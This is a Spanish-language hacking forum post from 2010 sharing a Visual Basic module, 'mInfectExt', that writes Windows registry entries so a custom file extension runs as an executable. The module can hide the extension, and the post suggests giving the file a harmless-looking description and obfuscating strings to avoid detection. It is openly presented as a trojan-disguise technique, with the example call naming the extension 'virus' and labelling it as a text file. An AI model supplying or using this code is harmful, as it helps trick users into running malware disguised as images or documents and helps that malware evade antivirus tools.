Imprimir Página - [SRC] mInfectExt.bas [Infeccion de extensiones]

Que hace?
Modifica el Registro añadiendo una nueva extensión de archivo

Para que sirve?
~~Posta esto sirve?~~
Cualquier tipo de archivo (.wav .jpg .txt ...) puede ser un ejecutable
Sencillamente lo que hacemos es "convencer" al sistema que nuestro archivo "PokebolaVe.jpg" es un ejecutable y que debe ser ejecutado como tal.

Como hace?
Se modifican unos valores en el registro.
Estos son:
(suponiendo que nuestra extensión es .Troj

Código:

HKEY_CLASSES_ROOT\.troj\"trojfile"
HKEY_CLASSES_ROOT\trojfile\"Documento de texto"
HKEY_CLASSES_ROOT\trojfile\"NeverShowExt"=""
HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command\""%1" %*"

Codigo mInfectExt

Código

Option Explicit
' /-----------------------------------------------------------------------------------\
'|=====================================================================================|
'|=/---------------------------------------------------------------------------------\=|
'|=| Module      : mInfectExt                                                        |=|
'|=| DateTime    : 24/07/2010 05:14 PM                                               |=|
'|=| Author      : Elemental Code                                                    |=|
'|=| Mail        : Elemental_Code[at]hotmail[dot]com                                 |=|
'|=| WebPage     : I haven't got one Yet ^.^                                         |=|
'|=| Purpose     : EDUCATIONAL ONLY code that creates a new extensión in Windows Reg |=|
'|=| Requirements: UAC may Stop you, i dont know >.<                                 |=|
'|=| Distribution: You can freely use this code in your own                          |=|
'|=|               applications, but you may not reproduce                           |=|
'|=|               or publish this code on any web site,                             |=|
'|=|               online service, or distribute as source                           |=|
'|=|               on any media without express permission.                          |=|
'|=\---------------------------------------------------------------------------------/=|
'|=====================================================================================|
' \-----------------------------------------------------------------------------------/
Public Function InfectExt(Ext As String, Info As String, Ocult as Boolean)
    Dim WS As Object
    Dim FullExt As String
    Dim UniqVal As String
    UniqVal = Ext & "File"
    FullExt = "." & Ext
 
    Set WS = CreateObject("WScript.Shell")
    WS.RegWrite "HKCR\" & FullExt & "\", UniqVal
    WS.RegWrite "HKCR\" & UniqVal & "\", Info
    If Ocult = True Then
        WS.RegWrite "HKCR\" & UniqVal & "\NeverShowExt", ""
    EndIf
    WS.RegWrite "HKCR\" & UniqVal & "\Shell\Open\Command\", Chr(34) & "%1" & Chr(34) & " %*"
End Function

Como Usar
lo llamamos y ponemos la extensión (sin el Punto .) y la Descripcion del archivo (traten de que se confunda con otra cosa >.<)

Código

InfectExt "virus", "Archivo de Texto", True

PD: "Encripten" todas las cosas entre comillas ("")para hacerlo indetectable ^.^

Editado, Ahora permite elegir si la extensión queda siempre oculta o no.

Foro de elhacker.net

Programación => Programación Visual Basic => Mensaje iniciado por: Elemental Code en 24 Julio 2010, 22:41 pm